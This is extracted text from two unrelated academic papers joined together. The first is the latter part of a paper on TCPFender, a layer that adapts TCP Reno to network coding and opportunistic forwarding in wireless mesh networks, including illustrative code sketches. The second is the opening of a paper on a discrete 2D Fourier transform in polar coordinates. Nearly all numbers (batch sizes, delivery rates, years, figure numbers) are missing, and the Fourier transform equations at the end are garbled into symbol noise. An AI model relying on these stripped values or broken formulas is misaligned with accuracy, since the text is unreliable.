( ) proposed a cross-layer technique to balance the load between relaying nodes based on bandwidth of wireless links, and they used an intra-flow network coding solution modelled by means of hidden markov processes. however, the schemes above were designed to utilize opportunistic data forwarding and network coding, but none of these was designed to support tcp. network coding in tcp a number of recent papers have utilized network coding to improve tcp throughput. in particular, (huang et al., ) introduce network coding to tcp traffic, where data segments in one direction and ack segments in the opposite direction can be coded at intermediate nodes. the simulation showed that making a small delay at each intermediate node can increase the coding opportunity and increase the tcp throughput. tcp/nc enables a tcp-compatible sliding-window approach to utilize network coding (sundararajan et al., ). such a variant of tcp is based on ack-based sliding-window network coding approach and improves the tcp throughput in lossy links. it uses the degree of freedom in the decoding matrix instead of the number of received original packets as the sequence number in ack. if a received packet increases the degree of freedom in the decoding matrix, this packet is called an innovative packet and this packet is ‘seen’ by the destination. the destination node will generate an acknowledgment whenever a coded packet is seen instead of producing an original packet. however, tcp/nc cannot efficiently control the waiting time for the decoding matrix to become full rank, and the packet loss can make tcp/nc’s decoding matrix very large, which causes a long packet delay (sun et al., ). tcp-von introduces online network coding (onc) to tcp/nc, which can smoothly increase the receiving data rate and packets can be decoded quickly by the destination node. however, these protocols are variants of rtt-based congestion control tcp protocols (e.g., vegas), which limits their applications in practice since most tcp protocols are loss-based congestion control (bao et al., ). tcp-fnc proposes two algorithms to increase the tcp throughput (sun et al., ). one is a feedback based scheme to reduce the waiting delay. the other is an optimized progressive decoding algorithm to reduce computation delay. it can be applied to loss-based congestion control, but it does not take advantage of opportunistic data forwarding. since tcp-fnc is based on traditional ip forwarding, it is easily affected by link quality variation. combocoding (chen et al., ) uses both inter- and intra-flow networking to support tcp with deterministic zhang et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. figure tcpfender design scheme. routing. the inter-flow coding is done between the data flows of the two directions of the same tcp session. the intra-flow coding is based on random linear coding serving as a forward-error correction mechanism. it has an adaptive redundancy to overcome variable packet loss rates over wireless links. however, combocoding was not designed for opportunistic data forwarding. contribution of tcpfender opportunistic data forwarding and network coding do not inherently support tcp, so many previous research on opportunistic data forwarding and network coding were not designed for tcp. other studies modified tcp protocols by cooperating network coding into tcp protocols; these work created different variants of tcp protocols to improve the throughput. 
however, tcp protocols (especially, tcp reno) are widely deployed in current communication systems, it is not easy work to modify all tcp protocols of the communication systems. therefore, we propose an adaptation layer (tcpfender) functioning below tcp reno. with the help of tcpfender, tcp reno do not make any change to itself and it can take advantage of both network coding and opportunistic data forwarding. design of tcpfender overview of tcpfender we introduce tcpfender as an adaptation layer above the network layer, which hides network coding and opportunistic forwarding from the transport layer. the process of tcpfender is shown in fig. . it confines the modification of the system only under the network layer. the goal of tcpfender is to improve tcp throughput in wireless mesh networks by opportunistic data forwarding and network coding. however, opportunistic data forwarding in wireless networks causes many dropped packets and out-of-order arrivals, and it is difficult for tcp sender to maintain a large congestion window. especially the underlying link layer is the stock ieee . , which only provides standard unreliable zhang et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. broadcast or reliable unicast (best effort with a limited number of retransmissions). tcp has its own interpretation of the arrival (or absence) of the ack segments and their timing. it opens up its congestion window based on continuous acks coming in from the destination. the dilemma is that when packets arrive out of order or are dropped, the tcp receiver cannot signal the sender to proceed with the expected ack segment. unfortunately, opportunistic data forwarding can introduce many out-of-order arrivals, which can significantly reduce the congestion window size of regular tcp since it increases the possibility of duplicated acks. furthermore, the long decoding delay for batch-based network coding does not fare well with tcp, because it triggers excessive time-out events. the tcpfender adaptation layer at the receiving side functions over the network layer and provides positive feedback early on when innovative coded packets are received, i.e., suggesting that more information has come through the network despite not being decoded for the time being. this process helps the sender to open its congestion window and trigger fast recovery when the receiving side acknowledges the arrival of packets belonging to a later batch, in which case the sending side will resend dropped packets of the unfinished batch. on the sender side, the ack signalling module is able to differentiate duplicated acks and filter useless acks (shown in fig. ). tcpfender algorithm to better support tcp with opportunistic data forwarding and network coding, tcpfender inserts the tcp adaptation layer above the network work layer at the source, the forwarder, and the destination. the main work of the tcp adaptation layer is to interpret observations of the network layer phenomena in a way that is understandable by tcp. the network coding module in the adaptation layer is based on a batch-oriented network coding operation. the original tcp packets are grouped into batches, where all packets in the same batch carry encoding vectors on the same basis. at the intermediate nodes, packets will be recoded and forwarded following the schedule of opportunistic data forwarding proposed by more, which proposes a transmission credit system to describe the duplication of packets. 
this transmission credit system can compensate for packet loss, increase the reliability of the transmission, and represent the schedule of opportunistic data forwarding. the network coding module in the destination node tries to decode the received coded packets into original packets whenever it receives a coded packet. the ack signalling modules at the source and the destination are responsible for the translation between tcp acks and tcpfender acks.

network coding in tcpfender

we implement batch-oriented network coding operations at the sender and receiver to support tcp transmissions. all data pushed down by the transport layer at the sender are grouped into batches, and each batch has a fixed number β (β = in our implementation) of packets of equal length (with possible padding). when the source has accumulated packets in a batch, these packets are coded with random linear network coding, tagged with the encoding vectors, and transmitted to downstream nodes. the downstream nodes are any nodes in the network closer to the destination. any downstream node can recode and forward packets when it receives a sufficient number of them. we use the transmission credit mechanism, as proposed in more, to balance the number of packets to be forwarded at intermediate nodes. we make two important changes to improve the network coding process of more for tcp transmissions. first, for a given batch, the source does not need to wait until the last packet of the batch has arrived from tcp before transmitting coded packets. we call this accumulative coding. that is, if k packets (k < β) have been sent down by tcp at a point in time, a random linear combination of these k packets is created and transmitted. initially, the coded packets only include information for the first few tcp data segments of the batch, but they include more towards the end of the batch. the reason for this 'early release' behaviour is for the tcp receiving side to be able to provide early feedback for the sender to open up the congestion window. second, we use a deeper pipelining than more, where we allow multiple batches to flow in the network at the same time. to do that, the sending side does not need to wait for the batch acknowledgement before proceeding with the next batch. in this case, packets of a batch are labeled with a batch index for differentiation, in order for tcp to have a stable, large congestion window size rather than having to reset it to 1 for each new batch. the cost of such pipelining is that all nodes need to maintain packets for multiple batches.

source adaptation layer

the source adaptation layer buffers all original packets of a batch that have not been acknowledged. the purpose is that when tcp pushes down a new data packet, or a previously sent data packet due to a loss event, the source adaptation layer can still mix it with the other data packets of the same batch. the ack signalling module can discern duplicated acks which are not in fact caused by network congestion. opportunistic data forwarding may produce many extra coded packets, specifically when some network links are of high quality at a certain point in time. this causes the destination node to send multiple acks with the same sequence number. in this case, such duplicated acks are not a signal of network congestion, and should be treated differently by the ack signalling module in the source.
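the accumulative coding step described above, in which the source codes whatever fraction of a batch tcp has already pushed down, can be illustrated with a short sketch. this is not the paper's implementation: the small prime field, the batch size and the function names below are illustrative assumptions, and practical codecs typically work over gf(2^8).

```python
import numpy as np

P = 257      # small prime field, an illustrative stand-in for the usual gf(2^8)
BETA = 8     # batch size; the paper fixes beta but the value here is assumed

def encode_accumulative(batch_payloads, rng):
    """random linear combination of the k <= BETA packets of a batch that tcp
    has pushed down so far ('accumulative coding' / early release).
    batch_payloads: list of equal-length integer arrays (already padded).
    returns (encoding_vector, coded_payload); the vector is zero-padded to
    BETA so receivers can see which batch positions are not yet covered."""
    k = len(batch_payloads)
    coeffs = rng.integers(1, P, size=k)                 # random nonzero coefficients
    coded = np.zeros_like(batch_payloads[0])
    for c, payload in zip(coeffs, batch_payloads):
        coded = (coded + c * payload) % P               # combine over the field
    encoding_vector = np.concatenate([coeffs, np.zeros(BETA - k, dtype=coeffs.dtype)])
    return encoding_vector, coded

rng = np.random.default_rng(0)
packets = [np.array([10, 20, 30]), np.array([1, 2, 3])]  # only 2 of 8 packets so far
vec, coded = encode_accumulative(packets, rng)
print(vec, coded)
```

a downstream node recodes in the same way, drawing fresh coefficients and combining the coded packets it has buffered for that batch, which is why the encoding vector must travel with every packet.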
these two cases of duplicated acks can actually be differentiated by tagging the acks with the associated sequence numbers of the tcp data segments. these acks are used by the tcpfender adaptation layer at the source and the destination and should be converted to original tcp acks before being delivered to the upper layer. the flow of data and ack transmissions is shown on the left of fig. . original tcp data segments are generated and delivered to the module of 'network coding and opportunistic forwarding'. here, tcp data segments may be distributed to several batches based on their tcp segment sequences, so retransmitted packets are always placed in the same batch as in their initial distribution. after the current tcp data segment is mixed with the packets in a batch, tcpfender data segments are generated and injected into the network via hop-by-hop ip forwarding, which is essentially broadcasting of ip datagrams. at the ack signalling module, when a tcpfender ack is received, if the ack's sequence number is greater than the maximum received ack sequence number, the ack is translated into a tcp ack and delivered to the tcp sender. otherwise, the ack signalling module checks whether this duplicated ack is caused by opportunistic data forwarding or not, and then decides whether to forward a tcp ack to tcp. the reason for differentiating duplicated acks at the source instead of at the destination is to reduce the impact of ack loss on tcp congestion control.

destination adaptation layer

the main function of the destination adaptation layer is to generate acks and to detect congestion in the network. it expects packets in the order of increasing batch index. for example, when it is expecting the bth batch, it implies that it has successfully received the packets of the previous b - 1 batches and delivered them up to the tcp layer. in this case, it is only interested in, and buffers, packets of the bth batch or later. however, the destination node may receive packets of any batch. suppose that the destination node is expecting the bth batch, and that the rank of the decoding matrix of this batch is r. in this case, the destination node has 'almost' received β × (b - 1) + r packets of the tcp flow, where β × (b - 1) packets have been decoded and pushed up to the tcp receiver, and r packets are still in the decoding matrix. when it receives a coded packet of the b′th batch, if b′ < b, the packet is discarded. otherwise, the packet is inserted into the corresponding decoding matrix. such an insertion increases r by 1 if b′ = b and the received packet is an innovative packet. a received packet is defined as an innovative packet only if it is linearly independent of all the buffered coded packets within the same batch. in either case, the destination generates an ack with sequence number β × (b - 1) + r, which is sent over ip back to the source node. one exception is that if r = β (i.e., the decoding matrix has become full rank), the ack sequence number is β × (b̂ - 1) + r̂, where b̂ is the next batch that is not full and r̂ is its rank. at this point, the receiver moves on to the b̂th batch. this mechanism ensures that the receiver can send multiple duplicate acks for the sender to detect congestion and start fast recovery. it also supports multiple-batch transmissions in the network and guarantees reliable transmission at the end of the transmission of each batch.
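the destination-side bookkeeping just described (buffer a packet only if it is innovative, then acknowledge β × (b - 1) + r) is easy to mis-read in prose, so a small sketch may help. the batch size and function names are illustrative assumptions, not the paper's code, and floating-point rank stands in for finite-field rank.

```python
import numpy as np

BETA = 8     # batch size; illustrative assumption

def is_innovative(decoding_matrix, coeffs):
    """a received coded packet is 'innovative' only if its coefficient vector is
    linearly independent of everything already buffered for the same batch,
    i.e., it raises the rank of the decoding matrix.  floating-point rank is
    used here purely for illustration; real codecs work over a finite field."""
    if decoding_matrix.shape[0] == 0:
        return bool(np.any(coeffs != 0))
    return (np.linalg.matrix_rank(np.vstack([decoding_matrix, coeffs]))
            > np.linalg.matrix_rank(decoding_matrix))

def ack_sequence_number(expected_batch, ranks):
    """ack = beta*(b - 1) + r for the expected batch b with decoding-matrix rank r;
    if that batch is already full rank, skip ahead to the next not-yet-full batch
    b_hat and report beta*(b_hat - 1) + r_hat, as described in the text."""
    b = expected_batch
    r = ranks.get(b, 0)
    while r == BETA:                       # batch b fully decodable: move on
        b += 1
        r = ranks.get(b, 0)
    return BETA * (b - 1) + r

# batches 1 and 2 fully decodable, batch 3 currently holds 5 degrees of freedom
print(ack_sequence_number(1, {1: 8, 2: 8, 3: 5}))    # 8*2 + 5 = 21
```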
the design of the destination adaptation layer is shown on the right of fig. . the network coding module has two functions. first, it checks whether the received tcpfender data segment is innovative or not; in either case, it notifies the ack signalling module to generate a tcpfender ack. second, it delivers original tcp data segments to the tcp layer if one or more original tcp data segments are decoded after receiving an innovative coded data packet. this mechanism can significantly reduce the decoding delay of batch-based network coding. on the other hand, tcpfender has its own congestion control mechanism, so tcp acks generated by the tcp layer are dropped by the ack signalling module at the destination.

forwarder adaptation layer

the flow of data at forwarders is shown in the middle of fig. . the ack is unicast from the destination to the source by ip forwarding, which is the standard forwarding mechanism and is not shown in the diagram. an intermediate node receives tcpfender data segments from below; each segment is placed into its corresponding batch, from which a new coded tcpfender data segment is regenerated. this new tcpfender data segment is sent to downstream forwarders via hop-by-hop ip broadcasting based on the transmission credit system proposed by more.

figure: diamond topology.
figure: string topology.

performance evaluation

in this section, we investigate the performance of tcpfender through computer simulations using ns- . the topologies of the simulations are made up of three exemplar network topologies and one specific mesh. these topologies are depicted in fig. 'diamond topology', fig. 'string topology', fig. 'grid topology', and fig. 'mesh topology'. the packet delivery rates at the physical layer for the mesh topology are marked in fig. , and the packet delivery rates for the other topologies are described in table . the source node and the destination node are at the opposite ends of the network. one ftp application sends long files from the source to the destination. the source node emits packets continuously until the end of the simulation, and each simulation lasts for s. all the wireless links have a bandwidth of mbps and the buffer size on the interfaces is set to packets. to compensate for the link loss, we used the hop-to-hop redundancy factor for tcpfender on a lossy link. recall that the redundancy factor is calculated based on the packet loss rate, as proposed in more (chachulski et al., ). this packet loss rate should incorporate the loss effect at both the physical and link layers, and is therefore higher than the marked physical-layer loss rates. the redundancy factors of the links are thus set according to these revised rates. we compared our protocol against tcp and tcp + nc in four network topologies. in our simulations, tcp ran on top of ip, and tcp + nc has batch-based network coding enabled but still runs over ip. the version of tcp is tcp reno for tcpfender and both baselines. the ack packets for the three protocols are routed to the source by shortest-path routing.

figure: grid topology.
table: packet delivery rates for the two node separations ( m and m), given as percentages.

in this paper, we examined whether tcpfender can effectively utilize opportunistic forwarding and network coding.
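as a rough illustration of how a per-link redundancy factor can be set from a combined loss estimate, consider the sketch below. it is a simplification under assumed numbers; more's actual credit calculation is more involved and accounts for the whole forwarder set, so this only illustrates why the revised loss rate exceeds the marked physical-layer rate.

```python
def combined_loss(p_phy, p_link):
    """fold additional link-layer loss into the marked physical-layer loss;
    the combined rate is higher than the physical-layer figure alone."""
    return 1.0 - (1.0 - p_phy) * (1.0 - p_link)

def redundancy_factor(p_loss):
    """expected number of transmissions per useful packet on a link with loss
    rate p_loss, used here as a simple per-link redundancy factor."""
    return 1.0 / (1.0 - p_loss)

p = combined_loss(p_phy=0.20, p_link=0.05)
print(round(p, 3), round(redundancy_factor(p), 2))   # 0.24, 1.32
```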
tcpfender provides reliable transmission in these four topologies, and the metrics we consider are the network throughput and the end-to-end packet delay at the application layer. we repeated each scenario times with different random seeds for tcpfender, tcp + nc, and tcp/ip, respectively. in tcpfender, every intermediate node has the opportunity to forward coded packets and all nodes operate in the 802.11 broadcast mode. by contrast, for tcp/ip and tcp + nc, we use the unicast mode of 802.11 with arq, and the routing module is shortest-path routing based on etx (couto et al., ). in the diamond topology (fig. ), the source node has three different paths to the destination. tcp and tcp + nc only use one path to the destination, but tcpfender can utilize more intermediate forwarders thanks to the opportunistic routing. the packet delivery rates for each link are varied between %, %, % and %. we plotted the throughput of these three protocols in fig. . in all cases, tcpfender has the highest throughput, and the performance gain is more visible for poor link qualities.

figure: mesh topology.
figure: throughput for the diamond topology.

next, we tested these protocols in the string topology (fig. ) with six nodes. the distance between two adjacent nodes is m, and the transmission range is the default m. different combinations of packet delivery rates for the -meter and -meter distances are described in table . as a result, the shortest-path routing used by tcp and tcp + nc can decide to use the m or m links depending on their relative reliability. the throughputs of the three protocols are plotted in fig. , where we observe how they perform under different link qualities. except for the one case where both the m and m links are very stable (i.e., % and %, respectively), the gains of having network coding and opportunistic forwarding are fairly significant in maintaining tcp's capacity to the application layer.

figure: throughput for the string topology.

when the links are very stable, the cost of the opportunistic forwarding schedule and the network coding delay slightly reduces the network throughput. we also plotted these three protocols' throughputs in a grid topology (fig. ) and a mesh topology (fig. ). each node has more neighbours in these two topologies compared to the string topology (fig. ), which increases the chance of opportunistic data forwarding. the packet delivery rates are indicated in these two figures (figs. and ). in general, the packet delivery rates drop when the distance between a sender and a receiver increases. in our experiment, the source and destination nodes are deployed at opposite ends of the network. the throughput of tcpfender is depicted in fig. and is much higher than that of tcp/ip, because opportunistic data forwarding and network coding increase the utilization of the network capacity. the gain is about % in our experiment. the end-to-end delays of the grid topology and the mesh topology are plotted in fig. . in general, tcp + nc has long end-to-end delays because packets need to be decoded before being delivered to the application layer; this is an inherent feature of batch-based network coding. tcpfender can benefit from backup paths and receive packets early, so it reduces the time spent waiting for decoding, and its end-to-end delay is shorter than that of tcp + nc.
next, we are interested in the impact of batch sizes on the throughput and the end-to-end delay. figure shows the throughput of tcpfender in the mesh topology for a range of batch sizes. in general, the batch size has an impact on the tcp throughput (as exemplified in fig. ). when the batch size is small (≤ ), increasing the batch size can increase the throughput, since it expands the congestion window. however, if the batch size is too large (> ), increasing the batch size decreases the throughput, because a larger batch size amplifies the fluctuation of the congestion window and also increases the packet overhead through longer encoding vectors.

figure: throughput and delay for the grid topology and the mesh topology.
figure: throughput and delay for different batch sizes.

the figure also shows how many packets are transmitted in the network. each intermediate node keeps all unfinished batches. from the figure, since the number of packets transmitted in the network is smaller than two batch sizes, intermediate nodes only need to keep two batches of packets, and the memory required to store the packets is acceptable.

figure: evolution of the congestion window for three different batch sizes simulated in the mesh topology.
figure: delay for two specific cases with batch sizes of and .

the nature of batch-based network coding also introduces decoding delays, so the batch size has a direct impact on the end-to-end delay, as summarized in fig. . in fig. , we plotted the end-to-end delays of all packets over time in two sample simulations. note that these tests were done for files that need many batches to carry. on the other hand, when the file size is comparable to the batch size, the file-wise delay will be comparable to the decoding delay of an entire batch, which may seem relatively large. however, because the file size is small, this delay is not overly significant, as it is on the order of the file's transmission time. nevertheless, network coding does add a considerable amount of delay in comparison to pure tcp/ip.

concluding remarks

in this paper, we proposed tcpfender, a novel mechanism to support tcp with network coding and opportunistic data forwarding. tcpfender completes the control feedback loop of tcp by creating a bridge between the adaptation modules of the sender and the receiver. the sender adaptation layer in tcpfender differentiates duplicate acks caused by network congestion from those caused by opportunistic data forwarding, and the receiver side releases ack segments whenever an innovative packet is received. in the current work, we implemented our algorithm to support tcp reno. in fact, tcpfender can also support other tcp protocols with loss-based congestion control (e.g., tcp-newreno, tcp-tahoe). the adaptation modules are designed generally enough to support not only network coding and opportunistic data forwarding, but also any packet forwarding technique that can cause many dropped packets or out-of-order arrivals. one example is multi-path routing, where ip packets of the same data flow can follow different paths from the source to the destination.
by simulating how the tcp receiver signals the tcp sender, we are able to adapt tcpfender to function over such multi-path routing without having to modify tcp itself. in the simulation results, we compared tcpfender and tcp/ip in four different network topologies. the results show that tcpfender has a sizeable throughput gain over tcp/ip, and the gain is most pronounced when the link quality is poor. we also discussed the influence of the batch size on the network throughput and the end-to-end packet delay. in general, the batch size has a small impact on the network throughput, but it has a direct impact on the end-to-end packet delay. in future work, we will consider tcp protocols with rtt-based congestion control and also analyze how multiple tcp flows interact with each other in a network-coded, opportunistic forwarding network layer, or a more generally error-prone network layer. we will refine the redundancy factor and the bandwidth estimation to optimize the congestion control feedback of tcp. finally, we will propose a theoretical model of tcp with opportunistic forwarding and network coding, which will enable us to study the behaviour of tcpfender in various communication systems.

additional information and declarations

funding
this work was supported in part by the natural sciences and engineering research council (nserc) of canada (discovery grants - and - , and strategic project grant stpgp - ). the funders had no role in study design, data collection and analysis, decision to publish, or preparation of the manuscript.

grant disclosures
the following grant information was disclosed by the authors:
natural sciences and engineering research council (nserc) of canada: - , - .
strategic project grant stpgp: - .

competing interests
the authors declare there are no competing interests.

author contributions
• chen zhang, yuanzhu chen and cheng li conceived and designed the experiments, performed the experiments, analyzed the data, contributed reagents/materials/analysis tools, wrote the paper, prepared figures and/or tables, performed the computation work, reviewed drafts of the paper.

data availability
the following information was supplied regarding data availability:
github: https://github.com/uploadforpeerj/ns- .

references
aguayo d, bicket j, biswas s, judd g, morris r. . link-level measurements from an 802.11b mesh network. in: proceedings of the conference on applications, technologies, architectures, and protocols for computer communications (sigcomm). new york: acm.
ahlswede r, cai n, li s-yr, yeung rw. . network information flow. ieee transactions on information theory.
argyriou a. . wireless network coding with improved opportunistic listening. ieee transactions on wireless communications.
bao w, shah-mansouri v, wong vw, leung vc. . tcp-von: joint congestion control and online network coding for wireless networks. in: global communications conference (globecom). piscataway: ieee.
basagni s, conti m, giordano s, stojmenovic i. . xors in the air: practical wireless network coding. ieee/acm transactions on networking.
biswas s, morris r. . exor: opportunistic multi-hop routing for wireless networks. in: proceedings of the acm sigcomm conference on applications, technologies, architectures, and protocols for computer communications (sigcomm). new york: acm.
cai s, zhang s, wu g, dong y, znati t. . minimum cost opportunistic routing with intra-session network coding. in: ieee international conference on communications (icc). piscataway: ieee.
chachulski s, jennings m, katti s, katabi d. . trading structure for randomness in wireless opportunistic routing. acm sigcomm computer communication review.
chen c-c, chen c, oh sy, park j-s, gerla m, sanadidi my. . combocoding: combined intra-/inter-flow network coding for tcp over disruptive manets. journal of advanced research.
chen y, zhang j, marsic i. . link-layer-and-above diversity in multi-hop wireless networks. ieee communications magazine.
couto dsjd, aguayo d, bicket j, morris r. . a high-throughput path metric for multi-hop wireless routing. in: proceedings of the annual international conference on mobile computing and networking (mobicom). new york: acm.
garrido p, gómez d, agüero r, serrat j. . combination of random linear coding and cross-layer opportunistic routing: performance over bursty wireless channels. in: ieee annual international symposium on personal, indoor, and mobile radio communications (pimrc). piscataway: ieee.
ho t, médard m, koetter r, karger dr, effros m, shi j, leong b. . a random linear network coding approach to multicast. ieee transactions on information theory.
hsu y-p, abedini n, gautam n, sprintson a, shakkottai s. . opportunities for network coding: to wait or not to wait. ieee/acm transactions on networking.
huang y, ghaderi m, towsley d, gong w. . tcp performance in coded wireless mesh networks. in: sensor, mesh and ad hoc communications and networks (secon). piscataway: ieee.
jaggi s, sanders p, chou pa, effros m. . polynomial time algorithms for multicast network code construction. ieee transactions on information theory.
jain s, das s. . exploiting path diversity in the link layer in wireless ad hoc networks. in: world of wireless mobile and multimedia networks (wowmom). piscataway: ieee.
koetter r, médard m. . an algebraic approach to network coding. ieee/acm transactions on networking.
koutsonikolas d, wang c-c, hu yc. . efficient network-coding-based opportunistic routing through cumulative coded acknowledgments. ieee/acm transactions on networking (ton).
krigslund j, hansen j, hundeboll m, lucani de, fitzek fhp. . core: cope with more in wireless meshed networks. in: vehicular technology conference (vtc spring).
laneman jn, tse dnc, wornell gw. . cooperative diversity in wireless networks: efficient protocols and outage behavior. ieee transactions on information theory.
larsson p. . selection diversity forwarding in a multihop packet radio network with fading channel and capture.
acm sigmobile mobile computing and communications review.
li p, guo s, yu sh, vasilakos av. . codepipe: an opportunistic feeding and routing protocol for reliable multicast with pipelined network coding. in: infocom. piscataway: ieee.
li s-yr, yeung rw, cai n. . linear network coding. ieee transactions on information theory.
lin y, li b, liang b. . codeor: opportunistic routing in wireless mesh networks with segmented network coding. in: ieee international conference on network protocols (icnp). piscataway: ieee.
lin y, liang b, li b. . slideor: online opportunistic network coding in wireless mesh networks. in: infocom, proceedings ieee. piscataway: ieee.
mehta t, narmawala z. . survey on multimedia transmission using network coding over wireless networks. in: nirma university international conference on engineering.
sun j, zhang y, tang d, zhang s, zhao z, ci s. . tcp-fnc: a novel tcp with network coding for wireless networks. in: international conference on communications (icc). piscataway: ieee.
sundararajan jk, shah d, medard m, jakubczak s, mitzenmacher m, barros j. . network coding meets tcp: theory and implementation. proceedings of the ieee.
wang z, chen y, li c. . corman: a novel cooperative opportunistic routing scheme in mobile ad hoc networks. ieee journal on selected areas in communications.
yan y, zhang b, mouftah ht, ma j. . practical coding-aware mechanism for opportunistic routing in wireless mesh networks. in: ieee international conference on communications. piscataway: ieee.
zhu d, yang x, yu w, lu c, fu x. . incor: inter-flow network coding based opportunistic routing in wireless mesh networks. in: ieee international conference on communications (icc). piscataway: ieee.

discrete two dimensional fourier transform in polar coordinates part ii: numerical computation and approximation of the continuous transform

xueyang yao and natalie baddour
department of systems design engineering, university of waterloo, waterloo, on, canada
department of mechanical engineering, university of ottawa, ottawa, on, canada

abstract
the theory of the continuous two-dimensional (2d) fourier transform in polar coordinates has been recently developed, but no discrete counterpart exists to date. in the first part of this two-paper series, we proposed and evaluated the theory of the 2d discrete fourier transform (dft) in polar coordinates. the theory of the actual manipulated quantities was shown, including the standard set of shift, modulation, multiplication, and convolution rules. in this second part of the series, we address the computational aspects of the 2d dft in polar coordinates. specifically, we demonstrate how the decomposition of the 2d dft as a dft, discrete hankel transform and inverse dft sequence can be exploited for coding. we also demonstrate how the proposed 2d dft can be used to approximate the continuous forward and inverse fourier transform in polar coordinates in the same manner that the 1d dft can be used to approximate its continuous counterpart.
subjects algorithms and analysis of algorithms, scientific computing and simulation, theory and formal methods
keywords fourier theory, dft in polar coordinates, polar coordinates, multidimensional dft, discrete hankel transform, discrete fourier transform, orthogonality

how to cite this article yao x, baddour n. . discrete two dimensional fourier transform in polar coordinates part ii: numerical computation and approximation of the continuous transform. peerj comput. sci. doi . /peerj-cs. submitted july, accepted january, published march. corresponding author: natalie baddour, nbaddour@uottawa.ca. academic editor: yilun shang. additional information and declarations can be found at the end of the article. copyright yao and baddour, distributed under a creative commons cc-by license.

introduction

the fourier transform (ft) is a powerful analytical tool and has proved to be invaluable in many disciplines such as physics, mathematics and engineering. the development of the fast fourier transform (fft) algorithm (cooley & tukey, ), which computes the discrete fourier transform (dft) with a fast algorithm, firmly established the ft as a practical tool in diverse areas, most notably signal and image processing. in two dimensions, the fft can still be used to compute the dft in cartesian coordinates. however, in many applications such as photoacoustics (xu, feng & wang, ) and tomography (scott et al., ; fahimian et al., ; lee et al., ; lewitt & matej, ), it is often necessary to compute the ft in polar coordinates. moreover, for functions that are naturally described in polar coordinates, a discrete version of the 2d ft in polar coordinates is needed. there have been some attempts to calculate the ft in polar coordinates, most notably through the hankel transform, since the zeroth-order hankel transform is known to be a 2d ft in polar coordinates for rotationally symmetric functions. however, prior work has focused on numerically approximating the continuous transform. this stands in contrast to the ft, where the dft can stand alone as an orthogonal transform, independent of the existence of its continuous counterpart. the idea of a polar ft has been previously investigated, where the spatial function is in cartesian coordinates but its ft is computed in polar coordinates (averbuch et al., ; abbas, sun & foroosh, ; fenn, kunis & potts, ). fts have been proposed for non-equispaced data, referred to as unequally spaced fft (usfft) or non-uniform fft (nufft) (dutt & rokhlin, ; fourmont, ; dutt & rokhlin, ; potts, steidl & tasche, ; fessler & sutton, ). a recent book gives a unified treatment of these topics (plonka et al., ). previous work has also considered the implications of using a polar grid (stark, ; stark & wengrovitz, ). although the above references demonstrate that the computation of a discrete 2d ft on a polar grid has previously been considered in the literature, there is to date no discrete 2d ft in polar coordinates that exists as a transform in its own right, with its own set of rules for the actual manipulated quantities. in part i of this two-part series, we proposed an independent discrete 2d ft in polar coordinates, which has been defined to be discrete from first principles (baddour, ).
for a discrete transform, the values of the transform are only given as entries in a vector or matrix, and the transform manipulates a set of discrete values. to quote bracewell (bracewell, ), "we often think of this as though an underlying function of a continuous variable really exists and we are approximating it. from an operational viewpoint, however, it is irrelevant to talk about the existence of values other than those given and those computed (the input and output). therefore, it is desirable to have a mathematical theory of the actual quantities manipulated". hence, in our previous paper (baddour, ), standard operational 'rules' of shift, modulation and convolution for this 2d dft in polar coordinates were demonstrated. the operational rules were demonstrated via the key properties of the proposed discrete kernel of the transform. however, using the discrete kernel may not be the most effective way to compute the transform. furthermore, while the 2d dft in polar coordinates was demonstrated to have properties and rules as a standalone transform, independent of its relationship to any continuous transform, an obvious application of the proposed discrete transform is to approximate its continuous counterpart. hence, the goal of this second part of the two-part paper is to propose computational approaches for the previously proposed 2d dft in polar coordinates and also to validate its effectiveness in approximating the continuous 2d ft in polar coordinates. the outline of the paper is as follows. "definition of the discrete 2d ft in polar coordinates" states the proposed definition of the discrete 2d ft in polar coordinates. the motivation of this definition and the transform rules (multiplication, convolution, shift etc.) are given in the first part of this two-part paper. the transform exists in its own right and manipulates discrete quantities that do not necessarily stem from sampling an underlying continuous quantity. nevertheless, the motivation for the definition of the transform is based on an implied underlying discretization scheme. "discrete transform to approximate the continuous transform" introduces the implied underlying discretization scheme, where we show the connection between discrete samples of the continuous functions and the discrete transform, should it be desirable to interpret the transform in this manner. here, the connection between the proposed 2d dft and sampled values of the continuous functions is explained. the proposed 2d dft was motivated by a specific sampling scheme ("discrete transform to approximate the continuous transform"), which can be plotted and analyzed for "grid coverage", that is, how much of the 2d plane is covered and at which density. thus, "discretization points and sampling grid" analyzes the proposed discretization points and their implication on the sampling grid for density and coverage of the grid. the insights gained from this section will be useful in interpreting the results of approximating the continuous transform with the discrete transform. "numerical computation of the transform" introduces numerical computation schemes whereby the interpretation of the proposed 2d transform as a sequence of 1d dft, 1d discrete hankel transform (dht) and 1d inverse dft (idft) is exploited.
“numerical evaluation of the d dft in polar coordinates to approximate the continuous ft” then investigates the ability of the proposed d dft to approximate the continuous transform in terms of precision and accuracy. three test functions for which closed-form continuous transforms are known are analyzed. finally, “summary and conclusion” summarizes and concludes the paper. definition of the discrete d ft in polar coordinates the d-dft in polar coordinates has been defined in the first part of this two-paper series as the discrete transform that takes the matrix (or double-subscripted series) fpk to the matrix (double-subscripted series) fql such that fpk ! fqm is given by fqm ¼ f fpk � � ¼ xn � k¼ xm p¼�m fpke � qm;pk ( ) where p; k; q; m; n, n , and n are integers such that �m � n � m, where m þ ¼ n � m; k; � n � and �m � p; q � m. unless otherwise stated, in the remainder of the paper it shall be assumed that p; k; q; m; n, n , and n are within these stated ranges. similarly, for the inverse transform we propose fpk ¼ f� fqm � � ¼ xn � m¼ xm q¼�m fqme þ qm;pk ( ) yao and baddour ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ in eqs. ( ) and ( ), e�qm;pk are the kernels of the transformation. these can be chosen as the “non-symmetric” form given by e�qm;pk ¼ n xm n¼�m jn jnkjnm jnn � � j nn j nþ jnkð Þ i�ne �i pnpn e þi pnqn eþqm;pk ¼ n xm n¼�m jn jnmjnk jnn � � j nþ jnmð Þ iþne þi pnpn e �i pnqn ( ) here, jn zð Þ is the nth order bessel function of the first kind and jnk denotes the kth zero of the nth bessel function. the subscript (+ or −) indicated the sign on the i� and on the exponent containing the p variable; the q variable exponent then takes the opposite sign. from a matrix point of view, both fpk and fql are n � n � ð Þ sized matrices. the form of the kernel in eq. ( ) arises naturally from discretization of the continuous transform, but does not lead to the expected parseval 